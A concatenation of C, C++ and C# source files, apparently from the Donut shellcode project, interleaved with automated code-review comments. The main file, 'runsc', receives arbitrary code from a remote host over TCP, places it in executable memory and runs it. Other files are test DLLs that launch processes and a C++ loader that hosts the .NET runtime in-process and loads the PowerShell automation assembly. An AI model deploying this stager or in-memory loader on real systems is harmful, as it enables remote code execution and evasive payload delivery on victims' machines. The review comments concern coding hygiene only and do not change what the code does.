353 ULONG LockCount;
354 ULONG SpareUlong0;
355 PVOID ResourceRetValue;
356 PVOID ReservedForWdf;
357 } TEB, *PTEB;
358
359 #endif
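Review bot: The header reproduces undocumented ntdll layouts but never states which fields must keep their exact offsets and which are merely filler, so a maintainer editing `_PEB` or `_TEB` cannot tell what is load-bearing. `PEB_LDR_DATA.Initialized` is declared `BOOL` where ntdll uses the one-byte `BOOLEAN`; the offsets still agree on x86 and x64 because `SsHandle` is pointer-aligned, I believe, but that coincidence deserves a comment rather than silence. I would add above `_PEB_LDR_DATA` something like `// Layout mirrors ntdll; the loader in this tree only dereferences Ldr, InLoadOrderModuleList, InLoadOrderLinks and DllBase (see xGetProcAddress). Initialized is BOOLEAN in ntdll; BOOL is offset-compatible here only because the next member is pointer-aligned.` and a one-line note on the `_SYSTEM_DEPENDENT_*` members saying they are placeholders that are never read.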
0
1 /**
2 Copyright © 2016-2019 Odzhan. All Rights Reserved.
3
4 Redistribution and use in source and binary forms, with or without
5 modification, are permitted provided that the following conditions are
6 met:
7
8 1. Redistributions of source code must retain the above copyright
9 notice, this list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright
12 notice, this list of conditions and the following disclaimer in the
13 documentation and/or other materials provided with the distribution.
14
15 3. The name of the author may not be used to endorse or promote products
16 derived from this software without specific prior written permission.
17
18 THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
19 IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
20 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
22 INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
23 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
25 HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
26 STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
27 ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
28 POSSIBILITY OF SUCH DAMAGE. */
29
30 #if defined(_WIN32) || defined(_WIN64)
31 #ifndef _WIN32_WINNT
32 #define _WIN32_WINNT 0x0502
33 #endif
34 #define WIN
35 #ifndef _WINSOCKAPI_
36 #define _WINSOCKAPI_
37 #endif
38 #include <windows.h>
39 #include <shlwapi.h>
40 #include <winsock2.h>
41 #include <ws2tcpip.h>
42 #define close closesocket
43 #define SHUT_RDWR SD_BOTH
44 #pragma comment(lib, "ws2_32.lib")
45 #pragma comment(lib, "shlwapi.lib")
46 #else
47 #include <unistd.h>
48 #include <sys/socket.h>
49 #include <sys/types.h>
50 #include <sys/mman.h>
51 #include <arpa/inet.h>
52 #include <netdb.h>
53 #include <netinet/in.h>
54 #include <sys/ioctl.h>
55 #include <net/if.h>
56 #include <signal.h>
57 #include <fcntl.h>
58 #endif
59
60 #include <stdio.h>
61 #include <stdint.h>
62 #include <string.h>
63 #include <stdlib.h>
64 #include <time.h>
65 #include <sys/stat.h>
66
67 #define RSC_CLIENT 0
68 #define RSC_SERVER 1
69 #define RSC_EXEC 2
70
71 #define RSC_SEND 0
72 #define RSC_RECV 1
73
74 #define DEFAULT_PORT "4444"
75
76 // structure for parameters
77 typedef struct _args_t {
78 int s, r;
79 char *port, *address, *file;
80 #ifdef WIN
81 char *modules;
82 #endif
83 int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;
84 struct sockaddr *ai_addr;
85 struct sockaddr_in v4;
86 struct sockaddr_in6 v6;
87 char ip[INET6_ADDRSTRLEN];
88 uint32_t code_len;
89 void *code;
90 } args_t;
91
92 #ifdef WIN
93 /**F*****************************************************************/
94 void xstrerror (char *fmt, ...)
95 /**
96 * PURPOSE : Display windows error
97 *
98 * RETURN : Nothing
99 *
100 * NOTES : None
101 *
102 *F*/
103 {
104 char *error=NULL;
105 va_list arglist;
106 char buffer[2048];
107 DWORD dwError=GetLastError();
108
109 va_start (arglist, fmt);
110 wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
111 va_end (arglist);
112
113 if (FormatMessage (
114 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
115 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
116 (LPSTR)&error, 0, NULL))
117 {
118 printf ("[ %s : %s\n", buffer, error);
119 LocalFree (error);
120 } else {
121 printf ("[ %s : %i\n", buffer, dwError);
122 }
123 }
124 #else
125 #define xstrerror printf
126 #endif
127
128 char *addr2ip(args_t *p)
129 {
130 void *src;
131 #ifdef WIN
132 DWORD ip_size=INET6_ADDRSTRLEN;
133 WSAAddressToString (p->ai_addr, p->ai_addrlen,
134 NULL, (char*)p->ip, &ip_size);
135 #else
136 if (p->ai_family==AF_INET) {
137 src=(void*)&p->v4.sin_addr;
138 } else {
139 src=(void*)&p->v6.sin6_addr;
140 }
141 inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN);
142 #endif
143 return p->ip;
144 }
145
146 int init_network (args_t *p)
147 /**
148 * PURPOSE : initialize winsock for windows, resolve network address
149 *
150 * RETURN : 1 for okay else 0
151 *
152 * NOTES : None
153 *
154 *F*/
155 {
156 struct addrinfo *list=NULL, *e=NULL;
157 struct addrinfo hints;
158 int r, t;
159
160 // initialize winsock if windows
161 #ifdef WIN
162 WSADATA wsa;
163 WSAStartup (MAKEWORD (2, 0), &wsa);
164 #endif
165
166 r=0;
167 // set network address length to zero
168 p->ai_addrlen = 0;
169
170 // if no address supplied
171 if (p->address==NULL)
172 {
173 // is it ipv4?
174 if (p->ai_family==AF_INET) {
175 p->v4.sin_family = AF_INET;
176 p->v4.sin_port = htons((u_short)p->port_nbr);
177 p->v4.sin_addr.s_addr = INADDR_ANY;
178 p->ai_addr = (struct sockaddr*)&p->v4;
179 p->ai_addrlen = sizeof (struct sockaddr_in);
180 } else {
181 // else it's ipv6
182 p->v6.sin6_family = AF_INET6;
183 p->v6.sin6_port = htons((u_short)p->port_nbr);
184 p->v6.sin6_addr = in6addr_any;
185 p->ai_addr = (struct sockaddr*)&p->v6;
186 p->ai_addrlen = sizeof (struct sockaddr_in6);
187 }
188 } else {
189 memset (&hints, 0, sizeof (hints));
190
191 hints.ai_flags = AI_PASSIVE;
192 hints.ai_family = p->ai_family;
193 hints.ai_socktype = SOCK_STREAM;
194 hints.ai_protocol = IPPROTO_TCP;
195
196 // get all network addresses
197 t=getaddrinfo (p->address, p->port, &hints, &list);
198 if (t == 0)
199 {
200 for (e=list; e!=NULL; e=e->ai_next)
201 {
202 // copy to ipv4 structure
203 if (p->ai_family==AF_INET) {
204 memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
205 p->ai_addr = (struct sockaddr*)&p->v4;
206 } else {
207 // ipv6 structure
208 memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
209 p->ai_addr = (struct sockaddr*)&p->v6;
210 }
211 // assign size of structure
212 p->ai_addrlen = e->ai_addrlen;
213 break;
214 }
215 freeaddrinfo (list);
216 } else {
217 xstrerror ("getaddrinfo");
218 }
219 }
220 return p->ai_addrlen;
221 }
222
223 void debug(void *bin)
224 {
225 //
226 //__builtin_trap();
227 //raise(SIGTRAP);
228 }
229
230 // allocate read/write and executable memory
231 // copy data from p->code and execute
232 void xcode(args_t *p)
233 {
234 void *bin;
235 int i;
236 int fd[2048];
237
238 if (p->code_len == 0) {
239 printf("[ no code to execute.\n");
240 return;
241 }
242 printf ("[ executing code...");
243
244 #ifdef WIN
245 bin=VirtualAlloc (0, p->code_len,
246 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
247 #else
248 bin=mmap (0, p->code_len,
249 PROT_EXEC | PROT_WRITE | PROT_READ,
250 MAP_ANON | MAP_PRIVATE, -1, 0);
251 #endif
252 if (bin!=NULL)
253 {
254 memcpy (bin, p->code, p->code_len);
255 // create file/socket descriptors to simulate real system
256 // created interesting results on openbsd with limits
257 // to how many files could be open at once..
258 //
259 if (p->sim) {
260 #ifndef WIN
261 for (i=0; i<p->sim && p->sim<2048; i++) {
262 fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
263 }
264 #else
265 // todo
266 for (i=0; i<p->sim && p->sim<2048; i++) {
267 }
268 #endif
269 }
270
271 // debug the code?
272 if (p->dbg) {
273 #if defined(_WIN32) || defined(_WIN64)
274 DebugBreak();
275 #else
276 raise(SIGTRAP);
277 #endif
278 }
279 // execute
280 ((void(*)())bin)();
281 printf("OK!\n");
282 if (p->sim) {
283 #ifndef WIN
284 // close all descriptors
285 for (i=0; i<p->sim && p->sim<2048; i++) {
286 close(fd[i]);
287 }
288 #else
289 // todo
290 #endif
291 }
292 #ifdef WIN
293 VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT);
294 #else
295 munmap (bin, p->code_len);
296 #endif
297 }
298 }
299
300 void send_data(args_t *p, int s) {
301 FILE *fd;
302 int outlen, len, opt;
303 uint32_t sum;
304 uint8_t buf[BUFSIZ];
305
306 // open file for read in binary mode
307 printf ("[ opening %s for read\n", p->file);
308 fd = fopen(p->file, "rb");
309
310 if (fd != NULL)
311 {
312 // send contents of file
313 printf ("[ sending data\n");
314 for (;;) {
315 // read block
316 outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd);
317 // zero or less indicates EOF
318 if (outlen <= 0) break;
319 // send contents
320 for (sum=0; sum<outlen; sum += len) {
321 len=send (s, &buf[sum], outlen - sum, 0);
322 if (len <= 0) break;
323 }
324 p->code_len += sum;
325 if (outlen != sum) break;
326 }
327 printf ("[ sent %i bytes\n", p->code_len);
328 fclose(fd);
329 }
330 }
331
332 void recv_data(args_t *p, int s) {
333 int opt, r;
334 fd_set fds;
335 struct timeval tv;
336 void *pv;
337
338 p->code_len = 0;
339 p->code = malloc(BUFSIZ);
340
341 // set to non-blocking mode
342 #ifdef WIN
343 opt=1;
344 ioctlsocket (s, FIONBIO, (u_long*)&opt);
345 #else
346 opt=fcntl(s, F_GETFL, 0);
347 fcntl(s, F_SETFL, opt | O_NONBLOCK);
348 #endif
349 // keep reading until remote disconnects or we run out of memory
350 printf ("[ receiving data\n");
351
352 for (;;) {
353 FD_ZERO(&fds);
354 FD_SET(s, &fds);
355
356 tv.tv_sec = 5;
357 tv.tv_usec = 0;
358 r = select(FD_SETSIZE, &fds, 0, 0, &tv);
359
360 if (r <= 0) {
361 printf ("[ waiting for data timed out or failed\n");
362 break;
363 }
364 // receive a block
365 r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0);
366 if (r <= 0) break;
367 p->code_len += r;
368 // resize buffer
369 pv = realloc(p->code, p->code_len + BUFSIZ);
370 // on error, free pointer
371 if(pv == NULL) {
372 p->code_len = 0;
373 free(p->code);
374 p->code = NULL;
375 printf("[ error: out of memory.\n");
376 break;
377 }
378 p->code = pv;
379 }
380 if(p->code_len != 0) {
381 printf ("[ received %i bytes\n", p->code_len);
382 }
383 }
384
385 //
386 int ssr (args_t *p)
387 /**
388 * PURPOSE : send a shellcode or receive one from remote system and execute it
389 *
390 * RETURN : 0 or length of shellcode sent/received
391 *
392 * NOTES : None
393 *
394 *F*/
395 {
396 int s, opt, r, t;
397 fd_set fds;
398 struct timeval tv;
399
400 p->code_len=0;
401
402 // create socket
403 printf ("[ creating socket\n");
404 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
405 if (s < 0) return 0;
406
407 // ensure we can reuse socket
408 t=1;
409 setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));
410
411 // bind to port
412 printf ("[ binding to port %s\n", p->port);
413 r = bind(s, p->ai_addr, p->ai_addrlen);
414 if (r == 0) {
415 // listen
416 r = listen (s, 1);
417 if (r == 0) {
418 printf ("[ waiting for connections on %s\n", addr2ip(p));
419 if (r == 0) {
420 t = accept(s, p->ai_addr, &p->ai_addrlen);
421 printf ("[ accepting connection from %s\n", addr2ip(p));
422 if (t > 0) {
423 if (p->tx_mode == RSC_SEND) {
424 send_data(p, t);
425 } else {
426 recv_data(p, t);
427 xcode(p);
428 }
429 }
430 }
431 // close socket to peer
432 shutdown(t, SHUT_RDWR);
433 close(t);
434 } else {
435 perror("listen");
436 }
437 } else {
438 perror("bind");
439 }
440 // close listening socket
441 shutdown(s, SHUT_RDWR);
442 close(s);
443
444 return p->code_len;
445 }
446
447 /**F*****************************************************************/
448 int csr (args_t *p)
449 /**
450 * PURPOSE : opens connection to remote system and sends shellcode
451 *
452 * RETURN : 0 or 1
453 *
454 * NOTES : None
455 *
456 *F*/
457 {
458 int s, r, opt;
459 fd_set fds;
460 struct timeval tv;
461
462 printf ("[ creating socket\n");
463 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
464 if (s < 0) return 0;
465
466 // try connect to remote
467 printf ("[ connecting to %s\n", addr2ip(p));
468 r = connect(s, p->ai_addr, p->ai_addrlen);
469
470 if (r == 0) {
471 if (p->tx_mode==RSC_SEND) {
472 send_data(p, s);
473 } else {
474 recv_data(p, s);
475 xcode(p);
476 }
477 } else {
478 xstrerror("connect");
479 }
480 printf ("[ closing connection\n");
481 shutdown(s, SHUT_RDWR);
482 close(s);
483 return 1;
484 }
485
486 /**F*****************************************************************/
487 void xfile(args_t *p)
488 /**
489 * PURPOSE : read contents of shellcode and attempt to execute it locally
490 *
491 * RETURN : Nothing
492 *
493 * NOTES : None
494 *
495 *F*/
496 {
497 FILE *fd;
498 int len;
499 void *pv;
500
501 p->code_len = 0;
502 p->code = NULL;
503
504 printf ("[ reading code from %s\n", p->file);
505 fd = fopen(p->file, "rb");
506
507 if (fd == NULL) {
508 xstrerror("fopen(\"%s\")", p->file);
509 return;
510 }
511 // read contents of file
512 for (;;) {
513 // first loop? allocate block
514 if(p->code == NULL) {
515 p->code = malloc(BUFSIZ);
516 }
517 // read a block of data
518 len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
519 if (len <= 0) break;
520 p->code_len += len;
521 // resize buffer for next read
522 pv = realloc(p->code, p->code_len + BUFSIZ);
523
524 if(pv == NULL) {
525 p->code_len = 0;
526 free(p->code);
527 p->code = NULL;
528 printf("[ error: out of memory!.\n");
529 break;
530 }
531 p->code = pv;
532 }
533 fclose(fd);
534
535 if(p->code_len != 0) {
536 xcode(p);
537 }
538 }
539
540 #ifdef WIN
541 void load_modules(char *names) {
542 HMODULE mod;
543 char *p = strtok(names, ";,");
544
545 while (p != NULL) {
546 printf ("[ loading %s...", p);
547 mod = LoadLibrary(p);
548
549 printf ("%s\n", mod==NULL ? "FAILED" : "OK");
550
551 p = strtok(NULL, ";,");
552 }
553 }
554 #endif
555
556 /**F*****************************************************************/
557 void usage (void) {
558 printf ("\n usage: runsc <address> [options]\n");
559 printf ("\n -4 Use IP version 4 (default)");
560 printf ("\n -6 Use IP version 6");
561 printf ("\n -l Listen mode (required when listening on specific interface)");
562 #ifdef WIN
563 printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
564 #endif
565 printf ("\n -f <file> Read PIC from <file>");
566 printf ("\n -s <count> Simulate real process by creating file descriptors");
567 printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
568 printf ("\n -x Execute PIC (requires -f)");
569 printf ("\n\n Press any key to continue . . .");
570 getchar ();
571
572 exit (0);
573 }
574
575 /**F*****************************************************************/
576 char* getparam (int argc, char *argv[], int *i) {
577 int n=*i;
578 if (argv[n][2] != 0) {
579 return &argv[n][2];
580 }
581 if ((n+1) < argc) {
582 *i=n+1;
583 return argv[n+1];
584 }
585 printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
586 exit (0);
587 }
588
589 void parse_args (args_t *p, int argc, char *argv[]) {
590 int i;
591 char opt;
592
593 // for each argument
594 for (i=1; i<argc; i++)
595 {
596 // is this option?
597 if (argv[i][0]=='-' || argv[i][1]=='/')
598 {
599 // get option value
600 opt=argv[i][1];
601 switch (opt)
602 {
603 case '4':
604 p->ai_family=AF_INET;
605 break;
606 case '6': // use ipv6 (default is ipv4)
607 p->ai_family=AF_INET6;
608 break;
609 case 'x': // execute PIC, requires -f
610 p->mode=RSC_EXEC;
611 break;
612 case 'd': // debug the code
613 p->dbg=1;
614 break;
615 case 'f': // file
616 p->file=getparam(argc, argv, &i);
617 break;
618 case 'l': // listen for incoming connections
619 p->mode=RSC_SERVER;
620 break;
621 #ifdef WIN
622 case 'm': // windows only, loads modules required by shellcode
623 p->modules = getparam(argc, argv, &i);
624 break;
625 #endif
626 case 's': // create file descriptors before execution
627 p->sim=atoi(getparam(argc, argv, &i));
628 break;
629 case 'p': // port number
630 p->port=getparam(argc, argv, &i);
631 p->port_nbr=atoi(p->port);
632 break;
633 case '?': // display usage
634 case 'h':
635 usage ();
636 break;
637 default:
638 printf ("[ unknown option %c\n", opt);
639 usage();
640 break;
641 }
642 } else {
643 // assume it's hostname or ip
644 p->address=argv[i];
645 p->mode=RSC_CLIENT;
646 }
647 }
648 }
649
650 int main (int argc, char *argv[]) {
651 args_t args;
652 struct stat st;
653
654 #ifdef WIN
655 //
656 PVOID OldValue=NULL;
657 WSADATA wsa;
658
659 //Wow64DisableWow64FsRedirection (&OldValue);
660 LoadLibrary("ws2_32");
661 LoadLibrary("advapi32");
662
663 WSAStartup(MAKEWORD(2,0), &wsa);
664 #endif
665
666 setbuf(stdout, NULL);
667 setbuf(stderr, NULL);
668
669 memset (&args, 0, sizeof(args));
670
671 // set default parameters
672 args.address = NULL;
673 args.file = NULL;
674 args.ai_family = AF_INET;
675 args.port = DEFAULT_PORT;
676 args.port_nbr = atoi(args.port);
677 args.mode = -1;
678 args.tx_mode = -1;
679 args.sim = 0;
680 args.dbg = 0;
681
682 printf ("\n[ run shellcode v0.2\n");
683
684 parse_args(&args, argc, argv);
685
686 // check if we have file parameter and it accessible
687 if (args.file!=NULL) {
688 if (stat (args.file, &st)) {
689 printf ("[ unable to access %s\n", args.file);
690 return 0;
691 }
692 }
693
694 #ifdef WIN
695 if (args.modules != NULL) {
696 load_modules(args.modules);
697 }
698 #endif
699 // if mode is executing
700 if (args.mode == RSC_EXEC) {
701 if (args.file != NULL) {
702 xfile(&args);
703 return 0;
704 } else {
705 printf ("\n[ you've used -x without supplying file with -f");
706 return 0;
707 }
708 }
709 if (init_network(&args)) {
710 // if no file specified, we receive and execute data
711 args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;
712
713 // if mode is -1, we listen for incoming connections
714 if (args.mode == -1) {
715 args.mode=RSC_SERVER;
716 }
717
718 // if no file specified, set to receive one
719 if (args.tx_mode == -1) {
720 args.tx_mode = RSC_RECV;
721 }
722
723 if (args.mode == RSC_SERVER) {
724 ssr (&args);
725 } else {
726 csr (&args);
727 }
728 }
729 if(args.code_len != 0) {
730 free(args.code);
731 }
732 return 0;
733 }
0
1 #define UNICODE
2 #include <windows.h>
3
4 #include "donut.h"
5 #pragma comment(lib, "user32.lib")
6
7 void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
8 typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR);
9
10 int main(void) {
11 HMODULE m;
12 _DonutApiW DonutApiW;
13 WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"};
14
15 WCHAR msg[4096];
16
17 _snwprintf(msg, ARRAYSIZE(msg),
18 L"param[0] : %ws\r"
19 L"param[1] : %ws\r"
20 L"param[2] : %ws\r"
21 L"param[3] : %ws\r",
22 param[0], param[1], param[2], param[3]);
23
24 MessageBox(NULL, msg, L"Donut Test", MB_OK);
25
26 m = LoadLibrary(L"call_api_dll.dll");
27
28 if(m != NULL) {
29 DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
30 if(DonutApiW != NULL) {
31 call_api((FARPROC)DonutApiW, 4, param);
32 }
33 }
34 return 0;
35 }
36
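Review bot: `_snwprintf(msg, ARRAYSIZE(msg), ...)` leaves `msg` without a terminator when the formatted text fills all 4096 characters, and `MessageBox` then reads on past the buffer; with the fixed `arg0`..`arg3` test strings this cannot happen here, but the same call in the two `DonutApiW` DLL exports further down formats caller-supplied strings. Pass `ARRAYSIZE(msg) - 1` and set `msg[ARRAYSIZE(msg) - 1] = L'\0';` afterwards, or use `_snwprintf_s(msg, ARRAYSIZE(msg), _TRUNCATE, ...)`. Separately, `LoadLibrary(L"call_api_dll.dll")` resolves a bare file name through the loader's search order; for a test harness that is acceptable, but a comment stating that the DLL is expected alongside the executable, plus a `FreeLibrary(m);` before `return 0;`, would make the intent explicit.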
0 #define WIN32_LEAN_AND_MEAN
1 #define UNICODE
2
3 #include <windows.h>
4 #include "donut.h"
5
6 #pragma comment(lib, "user32.lib")
7
8 __declspec(dllexport)
9 VOID APIENTRY DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
10 WCHAR msg[4096];
11
12 _snwprintf(msg, ARRAYSIZE(msg),
13 L"param[0] : %s\r"
14 L"param[1] : %s\r"
15 L"param[2] : %s\r"
16 L"param[3] : %s\r",
17 arg0, arg1, arg2, arg3);
18
19 MessageBox(NULL, msg, L"Donut Test", MB_OK);
20 }
21
22 __declspec(dllexport)
23 BOOL APIENTRY DllMain(HMODULE hModule,
24 DWORD ul_reason_for_call,
25 LPVOID lpReserved) {
26 switch (ul_reason_for_call) {
27 case DLL_PROCESS_ATTACH:
28 case DLL_THREAD_ATTACH:
29 case DLL_THREAD_DETACH:
30 case DLL_PROCESS_DETACH:
31 break;
32 }
33 return TRUE;
34 }
0 #define UNICODE
1
2 #include <stdint.h>
3 #include <stdio.h>
4 #include <stdlib.h>
5 #include <string.h>
6 #include <sys/stat.h>
7 #include <inttypes.h>
8
9 #include <windows.h>
10 #pragma comment(lib, "user32.lib")
11 #pragma comment(lib, "shell32.lib")
12
13 __declspec(dllexport)
14 VOID WINAPI RunProcess(PWCHAR proc1, PWCHAR proc2) {
15 PROCESS_INFORMATION pi;
16 STARTUPINFO si;
17
18 ZeroMemory(&si, sizeof(si));
19 si.cb = sizeof(si);
20 CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
21
22 ZeroMemory(&si, sizeof(si));
23 si.cb = sizeof(si);
24 CreateProcess(NULL, proc2, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
25 }
26
27 __declspec(dllexport)
28 VOID WINAPI DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
29 WCHAR msg[4096];
30
31 _snwprintf(msg, ARRAYSIZE(msg),
32 L"param[0] : %ws\r"
33 L"param[1] : %ws\r"
34 L"param[2] : %ws\r"
35 L"param[3] : %ws\r",
36 arg0, arg1, arg2, arg3);
37
38 MessageBox(NULL, msg, L"Donut Test", MB_OK);
39 }
40
41 __declspec(dllexport)
42 BOOL WINAPI DllMain(HMODULE hModule,
43 DWORD ul_reason_for_call,
44 LPVOID lpReserved) {
45 switch (ul_reason_for_call) {
46 case DLL_PROCESS_ATTACH:
47 MessageBox(NULL, L"Hello, World!", L"Hello, World!", 0);
48 break;
49 case DLL_THREAD_ATTACH:
50 case DLL_THREAD_DETACH:
51 case DLL_PROCESS_DETACH:
52 break;
53 }
54 return TRUE;
55 }
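Review bot: Both `CreateProcess` calls in `RunProcess` discard their return value and never close the handles returned in `pi`, so every successful launch leaks `pi.hProcess` and `pi.hThread` for the life of the host process; wrap each call as `if (CreateProcess(NULL, proc1, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) { CloseHandle(pi.hThread); CloseHandle(pi.hProcess); }` (and the same for `proc2`). Because `lpApplicationName` is NULL the executable is taken from the start of the command line, so a caller passing an unquoted path containing spaces can have `CreateProcess` resolve an unintended binary; that expectation belongs in a comment on the export. `ZeroMemory(&pi, sizeof(pi));` before the calls would also keep the handle fields defined when a launch fails.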
0 // A Hello World! program in C#.
1 using System;
2 namespace HelloWorld
3 {
4 class Hello
5 {
6 static void Main()
7 {
8 Console.WriteLine("Hello World!");
9
10 // Keep the console window open in debug mode.
11 Console.WriteLine("Press any key to exit.");
12 Console.ReadKey();
13 }
14 }
15 }
0
1 // code to implement hooking ProcessExit from unmanaged code
2 // https://docs.microsoft.com/en-us/dotnet/api/system.runtime.interopservices.marshal?view=netframework-4.8
3 //
4 #include <windows.h>
5 #include <oleauto.h>
6 #include <mscoree.h>
7 #include <comdef.h>
8 #include <propvarutil.h>
9 #include <metahost.h>
10
11 #include <cstdio>
12 #include <cstdint>
13 #include <cstring>
14 #include <cstdlib>
15 #include <sys/stat.h>
16
17 #import "mscorlib.tlb" raw_interfaces_only
18 #import "shdocvw.dll"
19
20 #pragma comment(lib, "mscoree.lib")
21
22 void my_function(void *evt) {
23 printf("Received event\n");
24 }
25
26 void DumpMethods(mscorlib::_TypePtr type) {
27 mscorlib::_MethodInfoPtr mi;
28 mscorlib::_ParameterInfoPtr pi;
29 mscorlib::_TypePtr ptype;
30 SAFEARRAY *sa, *params;
31 HRESULT hr;
32 LONG i, j, cnt, pcnt, lcnt, ucnt;
33 BSTR name;
34 VARIANT vt;
35 VARTYPE var;
36
37 hr = type->GetMethods(
38 (mscorlib::BindingFlags)
39 (mscorlib::BindingFlags_Static |
40 mscorlib::BindingFlags_Public),
41 &sa);
42
43 if(hr == S_OK) {
44 SafeArrayGetLBound(sa, 1, &lcnt);
45 SafeArrayGetUBound(sa, 1, &ucnt);
46
47 cnt = (ucnt - lcnt + 1);
48
49 for(i=0; i<cnt; i++) {
50 hr = SafeArrayGetElement(sa, &i, (void*)&mi);
51 if(hr == S_OK) {
52 mi->get_name(&name);
53 printf("%ws(", name);
54 hr = mi->GetParameters(&params);
55 if(hr == S_OK) {
56 SafeArrayGetLBound(params, 1, &lcnt);
57 SafeArrayGetUBound(params, 1, &ucnt);
58
59 pcnt = (ucnt - lcnt + 1);
60 printf("%i", pcnt);
61 for(j=0; j<pcnt; j++) {
62 hr = SafeArrayGetElement(params, &j, (void*)&pi);
63
64 // VARTYPE should be VT_UNKNOWN
65 hr = SafeArrayGetVartype(params, &var);
66 BSTR meth = SysAllocString(L"ParameterType");
67 DISPID id;
68 // hr = pi->GetIDsOfNames(IID_NULL, meth, 1, GetUserDefaultLCID(), &id);
69 //DISPATCH_METHOD, LOCALE_USER_DEFAULT, &id);
70 printf("HRESULT : %lx\n", hr);
71 }
72 }
73 printf(")\n");
74 }
75 }
76 }
77 }
78
79 void rundotnet(void *code, size_t len) {
80 HRESULT hr;
81 ICLRMetaHost *icmh;
82 ICLRRuntimeInfo *icri;
83 ICorRuntimeHost *icrh;
84 IUnknownPtr iu;
85 mscorlib::_AppDomainPtr ad;
86 mscorlib::_AssemblyPtr as, as1, as2, as3;
87 mscorlib::_MethodInfoPtr mi;
88 mscorlib::_EventInfoPtr nfo;
89 mscorlib::_TypePtr evt, ptr, type, mars, del, _void, powershell;
90 mscorlib::_DelegatePtr delegate;
91 mscorlib::_ParameterInfoPtr param;
92 mscorlib::_EventHandlerPtr handler;
93 VARIANT v1, v2, v_ptr, v_type, ret;
94 SAFEARRAY *sa, *sa2, *sav;
95 SAFEARRAYBOUND sab;
96 BOOL loadable;
97 LONG idx;
98
99 printf("CoCreateInstance(ICorRuntimeHost).\n");
100
101 hr = CLRCreateInstance(
102 CLSID_CLRMetaHost,
103 IID_ICLRMetaHost,
104 (LPVOID*)&icmh);
105
106 if(SUCCEEDED(hr)) {
107 printf("ICLRMetaHost::GetRuntime\n");
108
109 hr = icmh->GetRuntime(
110 L"v4.0.30319",
111 IID_ICLRRuntimeInfo, (LPVOID*)&icri);
112
113 if(SUCCEEDED(hr)) {
114 printf("ICLRRuntimeInfo::IsLoadable\n");
115 hr = icri->IsLoadable(&loadable);
116
117 if(SUCCEEDED(hr) && loadable) {
118 printf("ICLRRuntimeInfo::GetInterface\n");
119
120 hr = icri->GetInterface(
121 CLSID_CorRuntimeHost,
122 IID_ICorRuntimeHost,
123 (LPVOID*)&icrh);
124 } else return;
125 } else return;
126 } else return;
127
128 printf("ICorRuntimeHost::Start()\n");
129 hr = icrh->Start();
130 if(SUCCEEDED(hr)) {
131 printf("ICorRuntimeHost::GetDefaultDomain()\n");
132 hr = icrh->GetDefaultDomain(&iu);
133 if(SUCCEEDED(hr)) {
134 printf("IUnknown::QueryInterface()\n");
135 hr = iu->QueryInterface(IID_PPV_ARGS(&ad));
136 if(SUCCEEDED(hr)) {
137 BSTR strX = SysAllocString(L"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
138 // ([system.reflection.assembly]::loadfile("C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll")).FullName
139 BSTR str1 = SysAllocString(L"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35");
140
141 BSTR str2 = SysAllocString(L"mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089");
142
143 hr = ad->Load_2(str1, &as1); // load automation
144 hr = ad->Load_2(strX, &as3); // load interop services
145 printf("Loading System.Management.Automation : %lx\n", hr);
146 hr = ad->Load_2(str2, &as2); // load mscorlib
147
148 BSTR alloc = SysAllocString(L"Create");
